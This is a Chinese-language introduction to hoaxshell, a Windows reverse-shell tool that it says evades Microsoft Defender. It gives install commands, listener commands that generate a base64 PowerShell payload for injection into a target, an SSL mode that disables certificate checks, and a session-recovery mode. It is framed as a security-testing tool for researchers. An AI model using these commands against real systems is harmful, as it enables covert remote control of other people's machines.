hoaxshell：一款功能強大的非傳統Windows反向Shell

 關于hoaxshell 

hoaxshell是一款功能強大的非傳統Windows反向Shell，當前版本的Microsoft Defender和部分反病毒解決方案基本無法檢測到hoaxshell的存在。該工具易于使用，不僅可以生成其自己的PowerShell Payload，而且還可以支持加密（SSL），可以幫助廣大研究人員測試Windows系統的安全性。

當前版本的hoaxshell已在最新的Windows 11企業版和Windows 10專業版進行過測試。

 工具下載 

廣大研究人員可以使用下列命令將該項目源碼克隆至本地，并使用pip3和項目提供的requirements.txt安裝該工具所需的其他依賴組件，最后給hoaxshell.py提供可執行權限：

git clone https://github.com/t3l3machus/hoaxshellcd ./hoaxshellsudo pip3 install -r requirements.txtchmod +x hoaxshell.py

 工具使用 

注意事項：作為一種可以繞過安全檢測的方法，hoaxshell會在每次啟動腳本時自動為會話id、URL路徑和進程中使用的自定義http頭的名稱生成隨機值。生成的Payload將僅適用于為其生成的實例，我們可以使用-g選項關閉此特性，并重新建立活動會話，或使用新的hoaxshell實例重用以前生成的Payload。

通過http生成基礎Shell會話

sudo python3 hoaxshell.py -s <your_ip>

當你運行hoaxshell時，它將生成自己的PowerShell Payload，以便注入到目標主機中。默認情況下，為了方便起見，Payload使用的是base64編碼。如果需要原始Payload，可以使用“raw*payload”命令或“-r”參數。當Payload在目標設備上運行之后，我們就可以對其運行PowerShell命令了。

加密Shell會話（https）

# 生成自簽名證書:openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365# 以參數形式傳遞cert.pem和key.pem:sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

生成的PowerShell Payload的長度將更長，因為還有一塊代碼需要負責禁用ssl證書驗證。

獲取會話模式

如果你意外關閉了終端，你還可以通過“獲取會話模式”來重新啟動hoaxshell，該模式將重新建立會話，但前提是我們的Payload仍然還在目標設備上運行：

sudo python3 hoaxshell.py -s <your_ip> -g

 工具運行截圖 

Windows 10測試

Windows 11測試